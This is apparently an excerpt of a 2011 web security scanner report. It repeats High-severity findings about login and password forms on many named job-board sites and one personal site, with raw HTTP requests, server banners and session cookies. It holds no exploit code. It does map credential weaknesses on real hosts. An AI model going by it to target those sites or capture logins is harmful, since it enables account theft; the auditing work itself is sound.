| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:26:04 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=u5gd5nbnop Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:04 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:04 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:04 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:04 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:04 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:04 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:04 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 149370 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.environme |
| Path: | / |
| GET / HTTP/1.1 Host: www.environmentalcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:26:07 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=dq6vrirkde Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:07 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:07 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:07 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:07 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:07 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:07 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:07 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 103899 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.environme |
| Path: | / |
| GET / HTTP/1.1 Host: www.environmentalsaf Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:26:13 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=kinch90afs Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:13 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:13 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:13 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:13 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:13 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:13 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:13 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 109299 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.ericmmartin |
| Path: | /projects/simplemodal/ |
| GET /projects/simplemodal/ HTTP/1.1 Host: www.ericmmartin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:09:51 GMT Server: Apache X-Powered-By: PHP/5.3.3 Expires: Thu, 19 Nov 1981 08:52:00 GMT X-Pingback: http://www.ericmmartin Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Fri, 21 Jan 2011 20:01:28 GMT Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 34881 <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>SimpleModal / Eric Martin / ericmmartin.com</title> <meta name="author" content="Eric Ma ...[SNIP]... <div id="simplemodal-login <form name="loginform" id="loginform" action="http://www <div class="title"> ...[SNIP]... <br /> <input type="password" name="pwd" class="user_pass input" value="" size="20" tabindex="20" /></label> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.erpcrossing |
| Path: | / |
| GET / HTTP/1.1 Host: www.erpcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:26:16 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=f4lggi6e8n Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:16 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:16 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:16 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:16 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:16 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:16 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:16 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 116111 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.execcrossing |
| Path: | / |
| GET / HTTP/1.1 Host: www.execcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:26:21 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=sedi04t58r Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:21 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:21 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:21 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:21 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:21 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:21 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:21 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 130348 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.facilitie |
| Path: | / |
| GET / HTTP/1.1 Host: www.facilitiescrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:26:50 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=nc6a2h1em6 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:50 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:50 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:50 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:50 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:50 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:50 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:50 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 117478 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.financial |
| Path: | / |
| GET / HTTP/1.1 Host: www.financialservice Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:26:51 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=qsnigj0dej Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:51 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:51 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:51 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:51 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:51 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:51 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:51 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 117666 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.foodservi |
| Path: | / |
| GET / HTTP/1.1 Host: www.foodservicescrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:26:53 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=eh1vjkcudn Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:53 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:53 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:53 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:53 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:53 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:53 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:53 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 110006 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.fundraisi |
| Path: | / |
| GET / HTTP/1.1 Host: www.fundraisingcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:27:23 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=8b0film2tj Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:24 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:24 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:24 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:24 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:24 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:24 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:24 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 97962 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.giscrossing |
| Path: | / |
| GET / HTTP/1.1 Host: www.giscrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:27:26 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=0a97dse4dq Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:26 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:26 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:26 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:26 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:26 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:26 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:26 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 109314 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.governmen |
| Path: | / |
| GET / HTTP/1.1 Host: www.governmentcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:27:48 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=7ipjkgrjvb Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:48 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:48 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:48 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:48 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:48 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:48 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:48 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 117229 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.graduates |
| Path: | / |
| GET / HTTP/1.1 Host: www.graduateschoolloans Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:27:56 GMT Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=pv00mgmh60 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 92867 <script type="text/javascript" src="http://www <script type="text/javascript" src="http://www ...[SNIP]... <table cellspacing="0" cellpadding="1" border="0"> <form action="/index.php" name="formaccountlogin" method="post"> <input type="hidden" name="clslsluserlogin ...[SNIP]... <td><input type="password" name="clsregistration ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.healthcar |
| Path: | / |
| GET / HTTP/1.1 Host: www.healthcarecrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:27:59 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=pv7nj7m5sv Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:59 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:59 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:59 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:59 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:59 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:59 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:59 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 140242 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.helpdeskc |
| Path: | / |
| GET / HTTP/1.1 Host: www.helpdeskcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:28:06 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=20p261b30i Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:06 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:06 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:06 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:06 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:06 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:06 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:06 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 108384 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.hospitali |
| Path: | / |
| GET / HTTP/1.1 Host: www.hospitalitycrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:28:08 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=q8m0d2m0af Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:08 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:08 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:08 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:08 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:08 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:08 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:08 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 129154 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.hrcrossing.com |
| Path: | / |
| GET / HTTP/1.1 Host: www.hrcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:28:17 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=p4a701ljjt Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:18 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:18 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:18 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:18 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:18 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:18 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:18 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 116534 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.hvaccrossing |
| Path: | / |
| GET / HTTP/1.1 Host: www.hvaccrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
